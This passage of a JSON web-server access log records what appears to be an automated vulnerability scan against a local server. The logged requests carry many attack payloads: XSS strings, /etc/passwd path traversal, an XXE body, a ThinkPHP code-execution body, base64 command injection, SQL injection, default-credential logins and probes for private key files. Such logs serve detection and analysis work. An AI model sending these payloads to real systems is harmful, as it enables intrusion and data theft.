"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"--29N5m5YitgVJnev8B7M7ty1p6Wg\x0D\x0AContent-Disposition: form-data; name=\x2229N5mCWhJH7HCdL9FPAfcYOyZyg\x22; filename=\x2229N5mAbxEvNFzLfLf4haQngk39d.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29N5m5YitgVJnev8B7M7ty1p6Wg\x0D\x0AContent-Disposition: form-data; name=\x2229N5m9lr9isEqwn9w4GWcsghIGi\x22; filename=\x2229N5mAzzCo0GclIgxQm0OGuDfly.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29N5m5YitgVJnev8B7M7ty1p6Wg--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infophp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"{\x22\x22:1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29N5mCZRT4hJ3qn5uRKtzZHUj9s/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php_info.php 